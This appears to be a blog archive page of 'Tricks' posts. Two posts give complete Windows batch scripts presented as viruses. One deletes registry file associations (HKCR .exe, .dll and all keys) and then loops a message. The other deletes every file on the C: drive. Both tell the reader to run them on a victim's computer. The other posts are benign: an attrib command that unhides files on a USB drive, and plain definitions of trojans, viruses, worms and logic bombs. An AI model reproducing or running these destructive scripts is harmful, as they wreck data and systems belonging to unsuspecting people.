Showing posts with label Tricks. Show all posts
Showing posts with label Tricks. Show all posts

Wednesday, 22 July 2015

Destroy the registry

Make A Virus:-

Destroy the registry


"This is virus is highly risky. There is no recovery after using this..."


You need to write this Program in Notepad.exe

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your message here.
GOTO MESSAGE

SAVE THIS WITH  .bat file and run into Victim's Computer. And That PC is Done For It.

This Information is Knowledge Only!  

Monday, 20 July 2015

This Virus Deletes All the Data From Drive

VIRUS MAKING:

This Virus Deletes All the Data From Drive







Trick:

@Echo off

Del C:\ *.* |y



Save The Above Code a .bat file in Notepad and Run into Victim's Computer 
You Can Replace Drive tag.

I am not responsible for any damage.  it all on Your own risk.

Sunday, 23 November 2014

How to Remove Shortcut Virus From Pendrive

Remove Shortcut Virus From Pendrive


One such frustrating virus is well known ‘shortcut virus’. 


Antivirus software may detect the virus but can’t delete it from USB drive.


When ever the USB affected with shortcut virus,every piece of  data in it is shown as shortcut and Some time it will not be opened.





Now how to recover data and remove the virus:-


Step 1: Open CMD. (start > Run > cmd)

Step 2: now type:- attrib -h -r -s /s /d G:\*.*    
    
    "(G: is my USB drive letter. Replace with your USB letter)"

Step 3: Enter

Now Check your data....and Enjoy!!!!!!!!!!

You're Done!

Friday, 7 November 2014

What is a trojan/worm/virus/logic bomb?

What is a trojan/worm/virus/logic bomb?





Trojan:


     Remember the Trojan Horse? Bad guys hid inside it until they could get into the city to do their evil deed. A trojan computer program is similar. It is a program which does an unauthorized function, hidden inside an authorized program. It does something other than what it claims to do, usually something malicious (although not necessarily!), and it is intended by the author to do whatever it does. If it's not intentional, its called a 'bug' or, in some cases, a feature :)

Virus:


     A virus is an independent program which reproduces itself. It may attach to other programs, it may create copies of itself (as in companion viruses). It may damage or corrupt data, change data, or degrade the performance of your system by utilizing resources such as memory or disk space.

Worm:


     Made famous by Robert Morris, Jr. , worms are programs which reproduce by copying themselves over and over, system to system, using up resources and sometimes slowing down the systems. They are self contained and use the networks to spread, in much the same way viruses use files to spread.

Logic Bomb:


     Code which will trigger a particular form of 'attack' when a designated condition is met. For instance, a logic bomb could delete all files. Unlike a virus, a logic bomb does not make copies of itself.